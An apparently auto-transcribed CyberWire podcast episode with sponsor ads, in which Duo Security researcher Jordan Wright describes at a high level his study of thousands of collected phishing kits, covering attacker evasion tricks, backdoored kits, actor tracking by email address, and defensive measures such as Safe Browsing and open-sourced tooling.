CyberWire Daily - Exploring Phishing Kits with Duo Security's Jordan Wright. [Research Saturday]

Starting point is 00:00:00 You're listening to the Cyber Wire Network, powered by N2K. data products platform comes in. With Domo, you can channel AI and data into innovative uses that deliver measurable impact. Secure AI agents connect, prepare, and automate your data workflows, helping you gain insights, receive alerts, and act with ease through guided apps tailored to your role. Data is hard. Domo is easy. Learn more at ai.domo.com. That's ai.domo.com. Hello, everyone, and welcome to the CyberWire's Research Saturday. I'm Dave Bittner, and this is our weekly conversation with researchers and analysts tracking down threats and vulnerabilities and solving some of the hard problems of

Starting point is 00:01:10 protecting ourselves in a rapidly evolving cyberspace. Thanks for joining us. And now, a message from our sponsor, Zscaler, the leader in cloud security. Enterprises have spent billions of dollars on firewalls and VPNs, yet breaches continue to rise by an 18% year-over-year increase in ransomware attacks and a $75 million record payout in 2024. These traditional security tools expand your attack surface with public-facing IPs that are exploited by bad actors more easily than ever with AI tools. It's time to rethink your security.

Starting point is 00:01:57 Zscaler Zero Trust plus AI stops attackers by hiding your attack surface, making apps and IPs invisible, eliminating lateral movement, connecting users only to specific apps, not the entire network, continuously verifying every request based on identity and context,

Starting point is 00:02:16 simplifying security management with AI-powered automation, and detecting threats using AI to analyze over 500 billion daily transactions. Hackers can't attack what they can't see. Protect your organization with Zscaler Zero Trust and AI. Learn more at zscaler.com slash security. So I have quite a bit of a background in terms of fishing.

Starting point is 00:02:47 It's always been a hobby of mine and an area of interest. Jordan Wright is a senior research and development engineer at Duo Security. He's the author of the research report, Fish in a Barrel. My first exposure to fishing kits was a couple years ago, whenever I was doing some just high-level independent research around fishing in general, and I came across a fishing kit almost by accident. I found the kit, downloaded it, analyzed it, and realized maybe this is something that could be looked at at scale. You know, if we did this for thousands of fishing URLs, not just a one-off kind of approach.

Starting point is 00:03:27 But as time goes, you know, it always was kind of put on the back burner in terms of projects. And whenever I was looking at areas to investigate for Duo, this came up and really just struck an area of interest. I knew this was something that I wanted to look at. We had the resources and time to look at it, which resulted in this project. So before we dig into the actual research, can you give us a sense for the landscape? I mean, what is the state of fishing these days? Sure. Fishing is absolutely on the

Starting point is 00:03:57 rise. There was a report given out quarterly last year during 2016, there's an organization called the Anti-Fishing Working Group, and they consist of multiple organizations who all come together to share research, share data, and to try to combat fishing as a whole. And so they release quarterly reports that indicate the state of fishing and how often fishing sites are being seen. how often fishing sites are being seen. And what we found in 2016, the number of unique fishing sites seen in a given quarter, we broke the record. And we broke that record twice in 2016, first in Q1 and then in Q2. To give you an idea of the kind of scale that we're talking about, in Q2, there were over 460,000 unique fishing sites seen just in that quarter. To kind of break that down into a different number, that's over 5,000 unique fishing sites seen per day. It's clear that we need to start thinking in terms of at-scale approaches to mitigate fishing.

Starting point is 00:04:58 We need to analyze this as a bigger problem than just trying to hit one-off phishing sites and try to keep up and play whack-a-mole every day. So these numbers are not only growing, but they're growing to a level where we're having to start taking different approaches. Take us through how a typical phishing kit works. To give a bit of background on why phishing kits are even important at all, we have to remember this is a business. For attackers, like any business person, their goal is to maximize the return on investment. And so the entire idea around phishing kits is how can I make my phishing campaigns as efficient and cheap as possible? Because if I can do that and I can start harvesting credentials, then my return on investment is higher. And so what they'll do is they'll start by figuring out what site do I want to spoof. Let's say it's Facebook or Office

Starting point is 00:05:50 365 or Gmail, you name it. They'll figure out the site that they want to clone. They'll download local copies of all that site's resources. This includes the HTML, the images, the style sheets, everything that they need to host a local copy of that website. And then the HTML, the images, the style sheets, everything that they need to host a local copy of that website. And then they'll change the login form to point to a script that they control. Typically, this is a short PHP script that does nothing more than collects those credentials. And it almost ironically emails them to the attacker saying, I received these credentials from this phishing campaign. After an attacker has all these resources in this script, they'll bundle these up together

Starting point is 00:06:30 into a zip file, and then they'll figure out where do I want to host my next phishing campaign. But this zip file is the phishing kit. This has everything they need to run the campaign. So they'll look out and they'll find, let's say, typically a compromised CMS instance, like a WordPress instance, and they'll exploit an out-of-date plugin or an out-of-date theme to get access to upload their phishing kit onto that server. So they'll upload the zip file, they'll extract the files, and then they have a working phishing site on this hacked website. From there, they'll send out emails pointing to their new website, and they're off to the races. Now, the hacked website that they load their files onto, would the person running that site even be aware that this phishing kit might be living on their site? It really depends. It depends a lot on the monitoring that they have enabled. Traditionally,

Starting point is 00:07:25 what would likely happen is after phishing campaigns and after phishing emails are starting to be sent out, the abuse reports would start rolling in. Security companies would start detecting these sites and trying to shut them down. They'll send notices to the registrar, who in turn will let the person running and operating that website know so that they can try to go and clean up those efforts. And the people who've fallen victim to this, they might not even know that they've given up their credentials. You're absolutely right. And this is where phishing kits can be really sneaky.

Starting point is 00:08:03 So after I've put in my credentials, the last trick up a phishing kit's sleeve is that it's going to redirect me to the legitimate website. Because at this point, it has my credentials. It doesn't need anything else. And so by redirecting me to the legitimate login form, as a user, I just feel, I guess I put in my credentials wrong. I guess I must have done something different or the site didn't work. There was an error. But either way, now if I look up in the address bar or the URL bar,

Starting point is 00:08:25 I see the legitimate website. I don't think anything happened. So there's not even any sense that something's gone wrong and I have a good feeling I've gotten where I wanted to go. And meanwhile, my credentials have been sent off to the bad folks. Exactly. You know, this catches people just trying to live their daily lives, trying to do daily business. And so they would just chalk this up to say, I guess something went wrong. I'll log in again and move forward. So let's go through, how did you start tracking down these phishing kits? So it all starts with knowing what to look for. And this came from my previous research into this

Starting point is 00:08:59 individual phishing kit, which is knowing some different tricks and kind of relying on attackers being lazy and leaving these kits behind. Because that's really the whole reason this research was possible, is that whenever these files are extracted, they don't always delete the original zip file. And that's what we're targeting. If we can download that zip file, we can analyze the code inside of it, including the email address that these credentials are being sent to, as well as what information is being collected. And so we started by trying to figure out what are the best ways that we can track down this zip file. And there are two ways that we came across. The first is looking for what we call directory

Starting point is 00:09:42 indexes or directory listings. In web servers, it's commonly the case that they'll say, if you request a URL that ends with a slash, so indicating a folder, I would know what page to serve you. Say that's index.html or index.php, because I'm presuming that that file is going to be present in every folder. If it's not, which is commonly the case with these phishing kits, web servers can fall back and say, I'm just going to give you a listing of all of the contents in the directory. This includes all the file names that I have in this folder.

Starting point is 00:10:22 One of these file names would be the zip file. So that makes it really clear and easy for us to say there's a phishing kit, even if it's not the same name as the extracted contents. You know, let's say they called their phishing kit office365phishing.zip and the folder is just in the URL, you would just see office365. That's a really quick way for us to for sure get phishing kits if they're left on the server. But directory indexing and directory listing is configurable, and it's not always available. In our research, we found that it was available about 23% of the time. So it's a good amount, but it's not 100% reliable. And so we had to look at another method, which is, again, relying on

Starting point is 00:11:07 attackers being lazy in naming the zip file the same name as the extracted folder. So if they named their zip file Office 365.zip, and then they unzip those files into Office 365, the folder, zip those files into Office 365, the folder, all we have to do is just work our way up the URL, replacing every slash with.zip. And then if that phishing kit is there, we can download it. And so you gathered up quite a number of URLs. Take us through that part. We did. So we sourced our URLs from two different places. These are both community-driven feeds where anyone can go and submit a phishing URL to these feeds, which then in turn work with different security companies

Starting point is 00:11:50 to try to shut them down. The first is called Phish Tank, and they're run by OpenDNS. And the second is called OpenPhish. So we took both of these feeds and we watched them for a month. And over the course of a month, we analyzed over 66 course of a month, we analyzed

Starting point is 00:12:05 over 66,000 fishing, possibly fishing URLs. I say possibly because anyone can upload any URL they want. So it's not a guarantee that all of these are fishing, but a majority of the time they are. So after we analyzed all 66,000 of these URLs, we downloaded over 3,200 unique phishing kits. What's some of the data that you were able to gather from all of those unique phishing kits? That was the next step. We have this huge corpus of data and we need to figure out what does it mean? What's the significance? What can we learn from it? And this is where we started digging in. The first interesting thing that we found was that attackers are pretty good, or at least are trying to evade detection from security companies. The way this works is that it's a cat and mouse game. Attackers will stand

Starting point is 00:12:57 up a new phishing site, they'll send out emails, and they know that security companies are always looking to locate their phishing site and to shut it down. And so it's to their advantage. Remember, this is all return on investment for them to try to keep their phishing site available and up as long as possible. So there's a couple of things that they'll do to try to keep that level of persistence. The first is that they'll use a file called an HT access file. This is something that is specific to the Apache web server and it's a file that lets administrators tell Apache,

Starting point is 00:13:33 here are the connections that I want you to allow or deny. And you can do this based on any number of interesting attributes like the user agent or the IP address or the domain that they're claiming to come from. And so attackers will use these HD access files to put in the information about security companies. They'll say I want you to deny connections from these IP addresses which are known to belong to this security company or I want you to deny connections from this user agent,

Starting point is 00:14:06 which is known to be a crawler from this other company. And by doing this, they can try to hide a little bit. They can try to evade this detection, where if a company is going and looking for these websites, if they're using the infrastructure that this htaccess file is designed to block, they wouldn't see the site. It would be kind of hidden from view. This was really common.

Starting point is 00:14:29 This was really prevalent in all the kits that we found. And we found over 185 different unique HT access files. So this shows that there's definitely a level of information sharing between attackers. They'll kind of piecemeal different, you know, one piece of IP addresses from this file that I found, some user agents from this one, and they'll kind of mix and match, but they're all doing the same thing. And this is the same technique and the same idea that they'll use in a different way. So another detection or another evading technique that they'll use

Starting point is 00:15:05 is by creating PHP scripts, which do the basic same thing that the HT access files do. And they're designed to block connections based on any number of HTTP request attributes. Again, the user agent, IP address, you name it. But this is where things kind of got interesting. As we're looking through these PHP scripts to try to see what it is that they're trying to block or allow, we came across something really interesting, which is that we found multiple PHP scripts that had a hidden backdoor. This backdoor allows anyone, if you know what parameter to put on the end of the URL, to execute whatever system command you want.

Starting point is 00:15:47 So this kind of falls back on the phishing being an economy. In addition to attackers standing up their own campaigns, there's an entire economy around sharing, selling, trading phishing kits between one another. So one attacker may create a phishing kit and then trade or hand it off to any number of other attackers for use in their own campaigns. But it seems like some enterprising attackers, maybe people who wanted to get a little bit of access without really putting in the work, decided to put these hidden back doors into these files as a way to kind of maintain that persistence, as a way to maintain that control that persistence, as a way to maintain that control

Starting point is 00:16:25 and still have access to servers to host that they didn't take any part in compromising in the first place. These backdoors, we kind of expected to see a couple of them from previous work that had looked at similar situations in the past. But what really surprised us was the scale of the backdoors that we came across. The particular backdoor that you'll find in our report, that unique string was seen over 200 times, indicating this is surprisingly common. You know, these kits are being traded and used very frequently, but many of them are backdoored, letting anyone, including other attackers or security researchers or really anyone who would like to access these hosts can do so through these backdoors very, very easily.

Starting point is 00:17:19 Do you think with that many backdoors being out there that it's a matter of, I don't know, almost a cost of doing business for the folks who are putting these out there that they're they're you know the stuff still works for them but in exchange these back doors allow other people to take advantage of the work they've done that's a really good insight that's that's absolutely possible you know we we have to remember that this is all about quantity not quality you know they're attackers know that their phishing sites will be shut down relatively quickly. There's a lot of people looking for these and they're doing a very good job of finding and shutting down these phishing sites. And so it may be the case that

Starting point is 00:17:56 attackers realize the trade-off of analyzing every file in their kit for any kind of backdoor. Like you said, it may just not be worth it. It may be a cost of doing business. It may just say, I'm here to get my credentials as quickly as possible, and then I'm out. I'm going to go somewhere else. You also discovered a lot of reuse with these kits. Yes. After we analyzed the contents of the kits themselves, we wanted to figure out, what does the landscape look like for these fishing kits? Where are they being used? Can we identify two sets of problems? The first is can we identify unique fishing kits that are used in more than one place? Because this would

Starting point is 00:18:36 indicate the same attacker running multiple campaigns and compromising multiple hosts. And we did. We found that in our month span, most of the phishing kits that we came across were seen once. But 27% of the phishing kits that we found, about 900 of them, were seen in more than one place. In fact, a couple of the phishing kits that we've seen were found on more than 30 unique hosts, indicating that attackers had compromised 30 different web servers and ran 30 different campaigns all in the course of a month, which is pretty active. These are very active attackers,

Starting point is 00:19:17 constantly running new campaigns. And so being able to track this reuse gives really valuable insight to security researchers because they can start tracking actors in different places using very simple techniques that we show in the paper. The second problem, the second area that we wanted to map, and this is another area where it gets really interesting, is can we track attackers across different phishing kits. So the way that we decided this phishing kit is unique is that we took a hash of it, which means we shorten it down to a set of characters, which guarantee that it's a unique identifier across our data set. So this means all of the

Starting point is 00:20:00 content in that kit, including the email address of the attacker where credentials are being sent, is bundled into that hash. So if that email address or any other content changes, that hash will be different. And so we took all these hashes, and then we also took it another step further, and we extracted every email address we saw in the kits. And then we mapped all those out, which email addresses are found in which hashes, which unique phishing kits. And that's the map that people will find on, I think it's page 12, where we talk about tracking actors across kits. And here's kind of a, it gets even more interesting.

Starting point is 00:20:41 We talk about having an email address for where the credentials are being sent to, but there's another kind of interesting part about it, which is whenever attackers create these phishing kits, they want to leave kind of a signing card. They want to leave a note that says, this person created this phishing kit almost to get credit for it. A typical place that they'll put their email address is as the from address. So whenever you send an email, it has to have a from address.

Starting point is 00:21:11 Well, the email containing the stolen credentials is generally going to be sent from an email address that's the signing card for the person who made the kit. So what this means is that if I create a phishing kit and I put my email address as that signing card, I give it to another attacker. They go and they run multiple campaigns. Both my email address and that attacker's email address will be associated through that phishing kit. So we can take all of these email addresses,

Starting point is 00:21:42 both sender and recipient, and all of these kits and we can map them out. And then we result in an incredible landscape where we can see here's probably who created all these kits. Here's all the kits that they're associated with. And then here are the people using those kits. And then here are the URLs those are being used at. using those kits. And then here are the URLs those are being used at. So you can, at a glance, see the entire ecosystem and the landscape of what phishing attacks are being launched and who's behind them. And so being able to have that view of this ecosystem,

Starting point is 00:22:18 what kind of information were you able to gather from that? One interesting finding that we came across was a single email address was found in more than 115 unique phishing kits. Now, this email address was used, like we talked about, as that signing card, as that from address, which indicates that this actor who created this kit distributed it to any number of people, or they got their hands on it somehow and started using it. But seeing this wide of a scale in such a short time frame shows that the kits created by this alias are very common. And the kits that we found weren't just, it wasn't just one kit for one service.

Starting point is 00:23:01 We found kits with this actor's email address for almost every service provider, Gmail, Office 365, you name it. So it's not just one single attack vector. The people creating these kits are making them for any number of different services before they distribute them. And what else can you learn about the overall ecosystem? Is this a situation where you have a handful of kingpins who are then distributing the software to workers below them who are doing the dirty work, or is it more distributed than that? Is there any sense for that sort of thing? I'd say there's a healthy mix of both distributors, people who make either full

Starting point is 00:23:41 kits themselves or just components of them. Maybe they just make the credential stealing script and then they distribute that and say, you're gonna have to clone your own pages, but you can use this script to send out the emails. And then there's also the side of people who are more DIY in terms of creating their own fishing kits. The barrier to entry in this type of attack is very, very low.

Starting point is 00:24:04 That's why it's so common, because it's easy and cheap to get into, and it still yields incredible results in terms of the effectiveness of fishing in general. So this landscape is still pretty distributed, but it does have that healthy mix where we see both sides of the story. For those who are trying to defend against these sorts of things, these phishing attacks, what advice do you have for them? Absolutely. So this is an area that we're really excited about because we took all the code that we use to run this experiment and we're open sourcing it. We're making it freely available on GitHub for anyone to download it and try to replicate our results for their own organization.

Starting point is 00:24:44 anyone to download it and try to replicate our results for their own organization. They can put in phishing URLs that they're seeing against their own user base to try to track down the phishing kits behind them. And this gives admins a really good look at what information is being captured, as well as who's behind the attack, where these credentials are being sent. There's also the opportunity to partner up with different mail providers to where we can say, we've come across a phishing kit that's sending credentials to this email address. You may wish to shut this down as an attacker's account. So by having this information, we can start to have a much more full and rich incident response process that lets us take active measures on these phishing attacks as they occur.

Starting point is 00:25:27 Is there the possibility of automating the response to these sorts of things? That would be kind of taking this research to the next step, which is now that we have the ability to download this data in bulk and almost in a streaming fashion, could we somehow develop automated measures to respond to the emails that we find, to the phishing URLs that we find? There's a pretty good amount of automation being built in to respond to phishing URLs that are found. So these would be threat feeds that hook into popular products. Or a really good example is Google's Safe Browsing, which is built into the Google Chrome web browser, where as soon as they know about a confirmed phishing site, they'll add that to a global block list where whenever you try to navigate to that website, Chrome will tell you this is a known phishing site.

Starting point is 00:26:18 You may be in a phishing attempt. You may wish to go somewhere else at this point, which is a really effective way to get widespread protection for consumers. And so the type of automation around phishing URLs is pretty strong, but there's a level of automation that we could introduce around what do we do now that we know the attackers behind these campaigns? Can we, you know, kind of like we mentioned earlier, can we work directly with mail providers to send them the stream of email addresses if they don't already have them, indicating that they were known to be found in fraudulent phishing campaigns, where they could shut down those accounts even easier.

Starting point is 00:26:56 And once the account is shut down, any phishing credentials sent to that email address wouldn't be collected and couldn't be used for further fraud. email address wouldn't be collected and couldn't be used for further fraud. So at Duo Security, you have some tools that help people test their ability to stand up to these phishing attacks. And through that, you all get some interesting statistics. What can you share with us about that? Sure. So we do have a free tool called Duo Insight. And what it does, it allows organizations to test their own exposure to phishing completely free.

Starting point is 00:27:26 So they can set up a campaign with popular phishing pretexts and see how likely it is that their users would open, click, or even submit credentials to fake phishing sites. And so we're always collecting anonymous statistics about how effective our phishing campaigns are. And recent statistics show that over the course of testing about 150,000 recipients, we find that 45% of recipients open the email and 24% of recipients click the link. And at this point, it's important to take a step back and say this could already be game over in some aspects because we hear about browser plug-in vulnerabilities like Flash or Java. If those are out of date, it's easy for attackers to stand up malicious websites, which then compromise those plug-ins and install malware on the system.

Starting point is 00:28:20 And so even clicking the link can be pretty disastrous if we're not keeping our software up to date. And taking that a step further, we found that 13% of recipients actually go to the next step and enter their credentials into the fake phishing site. To kind of take that from a different angle, we found that 63% of campaigns were successful in capturing at least one credential. So it shows that we talk about phishing being cheap, and it's getting even more effective with the use of phishing kits, but it's also very effective as a practice. It's very effective as a measure to gain access to sensitive data or gain access to accounts or systems if more than half of your phishing campaigns are going to receive a credential. That's a really good return on investment. It shows why it's so important to really study and try to protect against the fishing landscape. What is your sense as to where we are in terms of facing this thread? Are we

Starting point is 00:29:15 gaining? Are the fishing people doing better with us or are we doing a better job of shutting them down? I've seen, especially in recent years, there's been multiple companies that have done incredible work at taking on phishing from a wider scale. I mentioned Google Safe Browsing, and that's a perfect example of Google realizing that they can help protect a large user base of anyone who uses Chrome against phishing sites very, very quickly. So we're making really good strides in terms of trying to protect against the increased number of phishing sites that we see, but it's still safe to say that we have room to grow. We have room to continue doing better, to continue studying these attacks and trying

Starting point is 00:29:59 to figure out what protections can we put in place to try to thwart them. But as a whole, you know, security companies and browser makers are doing a good job of trying to combat a threat and take it head on, which is always encouraging to see. Our thanks to Jordan Wright from Duo Security for joining us. You can find the complete report, Fish in a Barrel, in the blog section of the Duo Security website. Cyber threats are evolving every second, and staying ahead is more than just a challenge. It's a necessity. That's why we're thrilled to partner with ThreatLocker, a cybersecurity solution trusted by businesses worldwide.

Starting point is 00:30:48 ThreatLocker is a full suite of solutions designed to give you total control, stopping unauthorized applications, securing sensitive data, and ensuring your organization runs smoothly and securely. Visit ThreatLocker.com today to see how a default deny approach can keep your company safe and compliant. The Cyber Wire Research Saturday is proudly produced in Maryland out of the startup studios of Data Tribe, where they're co-building the next generation of cybersecurity teams and technologies. Our amazing Cyber Wire team is Elliot Peltzman, Puru Prakash, Stefan Vaziri, Kelsey Bond,

Starting point is 00:31:29 Tim Nodar, Joe Kerrigan, Carol Terrio, Ben Yellen, Nick Valecki, Gina Johnson, Bennett Moe, Chris Russell, John Petrick, Jennifer Iben, Rick Howard, Peter Kilpie, and I'm Dave Bittner. Thanks for listening.

Your Ad Here

CyberWire Daily - Exploring Phishing Kits with Duo Security's Jordan Wright. [Research Saturday]

There aren't comments yet for this episode. Click on any sentence in the transcript to leave a comment.